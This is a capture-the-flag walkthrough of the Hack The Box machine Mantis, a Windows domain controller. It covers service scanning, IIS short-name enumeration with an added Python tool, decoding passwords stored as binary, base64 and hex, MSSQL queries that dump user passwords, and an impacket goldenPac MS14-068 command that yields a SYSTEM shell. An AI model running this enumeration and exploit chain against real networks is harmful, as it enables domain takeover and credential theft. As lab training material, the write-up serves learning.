nmap -p- --min-rate 1000 -v -sV -sC -A -Pn 10.10.10.52
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-04 11:28:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1337/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-07-04T11:25:46
| Not valid after: 2053-07-04T11:25:46
| MD5: 4e49 4475 2b35 0d8a 3b2b 502c 1546 b06f
|_SHA-1: 9dc9 68ee a242 0a79 8fcd fae2 310a 3308 7326 e0e3
|_ssl-date: 2023-07-04T11:29:47+00:00; -1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open unknown
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49735/tcp open unknown
50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-07-04T11:25:46
| Not valid after: 2053-07-04T11:25:46
| MD5: 4e49 4475 2b35 0d8a 3b2b 502c 1546 b06f
|_SHA-1: 9dc9 68ee a242 0a79 8fcd fae2 310a 3308 7326 e0e3
|_ssl-date: 2023-07-04T11:29:48+00:00; -1s from scanner time.
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 34m17s, deviation: 1h30m45s, median: 0s
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2023-07-04T07:29:26-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-07-04T11:29:24
|_ start_date: 2023-07-04T11:25:39
The scan shows the domain controller is mantis.htb.local and the domain is htb.local.
OS: Windows Server 2008 R2 Standard 7601 Service Pack 1.
DNS refuses zone transfers. RPC accepts an anonymous bind but nothing can be done without privileges, and SMB likewise accepts a null session but lists nothing. Port 1337 is the default IIS 7 page; the web app on 8080 is a blog.
The blog is clearly Orchard CMS (the ASP.NET Orchard, not Orchard Core). Its known CVEs are almost all XSS, so that didn't look like the way in.
Back to port 1337: IIS 8.3 short filename (tilde) enumeration works there.
One hit is obviously the default aspnet_client directory, which holds nothing useful.
The first hit begins with secure, so build a wordlist of words starting with secure and brute-force it:
grep ^secure /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt > ~/Downloads/temp/mantis/dir.txt
That turns up a secure_note directory.
The txt file inside reads:
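The tilde enumeration step above, worked through in code. This is an added example, not part of the original write-up or of any existing IIS short-name scanner: it grows 8.3 names one character at a time against a yes/no oracle. The live oracle encodes the IIS 7.5 + ASP.NET behaviour that a request such as /SECURE*~1*/.aspx answers 404 when a matching short name exists and 400 when none does; the simulated oracle and the sample listing (ASPNET~1 for aspnet_client, SECURE~1 for the secure_note directory, WEB~1.CON for a web.config) are constructed so the logic runs offline. The character set and the `~1`-only handling are simplifying assumptions.

```python
"""IIS 8.3 short-name (tilde) enumeration.

Added example, not code from the original write-up. The request oracle is
pluggable: a live one for IIS 7.5 + ASP.NET, and a simulated one built on a
constructed directory listing so the search logic can be run offline.
"""
import fnmatch
import urllib.error
import urllib.request
from typing import Callable, List, Set

# Assumption: base names drawn from the common 8.3 subset; real short names may
# also contain a handful of other punctuation characters.
CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"

# Constructed listing standing in for the target: the aspnet_client directory,
# the secure* directory and a web.config, each in its 8.3 form.
SAMPLE_SHORT_NAMES = {"ASPNET~1", "SECURE~1", "WEB~1.CON"}

Oracle = Callable[[str], bool]


def make_simulated_oracle(short_names: Set[str]) -> Oracle:
    """Answer 'does any 8.3 name match this wildcard pattern?' locally."""
    return lambda pattern: any(fnmatch.fnmatchcase(n, pattern) for n in short_names)


def make_http_oracle(base_url: str, timeout: float = 5.0) -> Oracle:
    """Live oracle. On IIS 7.5 with ASP.NET, GET /<pattern>/.aspx returns 404
    when some short name matches the pattern and 400 when none does; anything
    else is treated as 'no match'. Not exercised offline."""
    def oracle(pattern: str) -> bool:
        url = f"{base_url.rstrip('/')}/{pattern}/.aspx"
        try:
            urllib.request.urlopen(url, timeout=timeout)
        except urllib.error.HTTPError as err:
            return err.code == 404
        except urllib.error.URLError:
            return False
        return False
    return oracle


def enumerate_short_names(oracle: Oracle, charset: str = CHARSET,
                          max_base: int = 6, max_ext: int = 3) -> List[str]:
    """Grow base names one character at a time, then extensions, asking the
    oracle at each step: roughly len(charset) requests per confirmed character,
    far fewer than guessing whole names from a wordlist."""
    found: List[str] = []

    def walk_ext(base: str, ext: str) -> None:
        exact = f"{base}~1" if not ext else f"{base}~1.{ext}"
        if oracle(exact):            # no wildcard: extension (or its absence) is final
            found.append(exact)
        if len(ext) < max_ext:
            for c in charset:
                if oracle(f"{base}~1.{ext}{c}*"):
                    walk_ext(base, ext + c)

    def walk_base(prefix: str) -> None:
        if prefix and oracle(f"{prefix}~1*"):   # '~1' right after prefix: base complete
            walk_ext(prefix, "")
        if len(prefix) < max_base:
            for c in charset:
                if oracle(f"{prefix}{c}*~1*"):
                    walk_base(prefix + c)

    walk_base("")
    return sorted(found)


if __name__ == "__main__":
    for name in enumerate_short_names(make_simulated_oracle(SAMPLE_SHORT_NAMES)):
        print(name)
```

Real scanners also iterate ~2, ~3 and so on for colliding names and use a wider character set. The check to run before trusting an empty result is whether the 404/400 split is actually present: a custom error page or a WAF that normalises responses leaves the oracle blind.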
Download OrchardCMS
Download SQL server 2014 Express ,create user "admin",and create orcharddb database
Launch IIS and add new website and point to Orchard CMS folder location.
Launch browser and navigate to http://localhost:8080
Set admin password and configure sQL server connection string.
Add blog pages with admin user.
(many blank lines)
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez
Requesting web.config returns a 404.
Convert the binary string to ASCII:
bin_str = "010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001"
# Convert each group of 8 bits to one ASCII character
ascii_str = ""
for i in range(0, len(bin_str), 8):
    byte = bin_str[i:i+8]
    ascii_str += chr(int(byte, 2))
print(ascii_str)
This gives @dm!n_P@ssW0rd!, which logs into the blog as admin.
The note says the SQL Server password is tied to the file name, and the file name does indeed look like base64:
echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx"|base64 -d
Decoding gives
6d2424716c5f53405f504073735730726421
which is a string of hex digits, so convert once more:
echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx"|base64 -d| xxd -r -p
That yields m$$ql_S@_P@ssW0rd!
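The two decoding steps above (binary to ASCII for the admin password, base64 then hex for the SQL password) as one added example, not code from the original write-up: a small layer-peeler that recognises each encoding by its alphabet and length, decodes it, and keeps going while the result is printable. The test strings are the two tokens from the note.

```python
"""Peel stacked binary / hex / base64 layers off a token.

Added example, not code from the original write-up. Each layer is recognised by
its alphabet and length, decoded, and accepted only if the result is printable.
"""
import base64
import binascii
import re
import string
from typing import Callable, List, Optional, Tuple

# What counts as finished plaintext: printable ASCII without control characters.
_PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def _printable(text: str) -> bool:
    return bool(text) and all(ch in _PRINTABLE for ch in text)


def _from_binary(s: str) -> Optional[str]:
    """8 bits per character, as in the note's admin password."""
    if not re.fullmatch(r"[01]+", s) or len(s) % 8:
        return None
    return "".join(chr(int(s[i:i + 8], 2)) for i in range(0, len(s), 8))


def _from_hex(s: str) -> Optional[str]:
    if not re.fullmatch(r"[0-9A-Fa-f]+", s) or len(s) % 2:
        return None
    return bytes.fromhex(s).decode("latin-1")


def _from_base64(s: str) -> Optional[str]:
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) or len(s) % 4:
        return None
    try:
        return base64.b64decode(s, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


# Priority matters: every binary string is valid hex and every hex string is
# valid base64, so the most specific alphabet is tried first.
_LAYERS: List[Tuple[str, Callable[[str], Optional[str]]]] = [
    ("binary", _from_binary),
    ("hex", _from_hex),
    ("base64", _from_base64),
]


def peel(token: str, max_depth: int = 8) -> Tuple[str, List[str]]:
    """Return (plaintext, names of the layers removed, outermost first).

    Limitation: a plaintext consisting solely of hex or base64 characters is
    indistinguishable from one more layer and will be decoded once too often.
    """
    current = token.strip()
    removed: List[str] = []
    for _ in range(max_depth):
        for name, decoder in _LAYERS:
            result = decoder(current)
            if result is not None and _printable(result):
                current = result
                removed.append(name)
                break
        else:
            break  # no layer applies: current is the plaintext
    return current, removed


if __name__ == "__main__":
    # The two tokens from the note on the box.
    for token in (
        "010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001",
        "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx",
    ):
        text, layers = peel(token)
        print(f"{' -> '.join(layers)}: {text}")
```

Order matters because the alphabets nest: binary is tried first and base64 last. The flip side, noted in the docstring, is that a genuine plaintext made only of hex or base64 characters gets decoded one step too far; when that matters, check the result against what the context expects (here, a password that actually logs in).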
impacket-mssqlclient -db orcharddb admin:'m$$ql_S@_P@ssW0rd!'@10.10.10.52
The note labels these "sa credentials", but it also says an "admin" SQL user was created, and admin is the login that works. It connects, but this login cannot enable xp_cmdshell: sp_configure needs the ALTER SETTINGS server permission, which only sysadmin and serveradmin hold. So enumerate the data instead.
-- database names
SELECT name FROM master..sysdatabases;
-- table names
SELECT TABLE_NAME FROM orcharddb.INFORMATION_SCHEMA.TABLES;
-- column names
SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'blog_Orchard_Users_UserPartRecord';
select username,password from blog_Orchard_Users_UserPartRecord;
Besides admin there is a james user with the password J@m3s_P@ssW0rd!
It does not log into the database, but it does authenticate over SMB:
smbclient -L //10.10.10.52/ -U "James"%'J@m3s_P@ssW0rd!'
smbmap -H 10.10.10.52 -u James -p 'J@m3s_P@ssW0rd!'
smbmap -H 10.10.10.52 -u James -p 'J@m3s_P@ssW0rd!' -d htb.local -R "SYSVOL"
C$ and ADMIN$ are denied, the other two shares are read-only, and nothing in SYSVOL leaks a password.
I also pulled the domain user information over RPC,
which gave nothing useful either. After going in circles for a while I checked a walkthrough: it simply uses the james account to exploit MS14-068 (CVE-2014-6324), the Kerberos PAC validation flaw that lets any domain user forge a PAC claiming Domain Admins membership against a DC missing KB3011780. An unpatched 2008 R2 DC plus one low-privilege domain account is exactly that situation. goldenPac needs mantis.htb.local to resolve (an /etc/hosts entry) and the clocks to be within Kerberos' five-minute tolerance; nmap reported a 0s median skew here.
impacket-goldenPac htb.local/james:'J@m3s_P@ssW0rd!'@mantis.htb.local -dc-ip 10.10.10.52
That lands a psexec shell as SYSTEM on the DC, and the flag.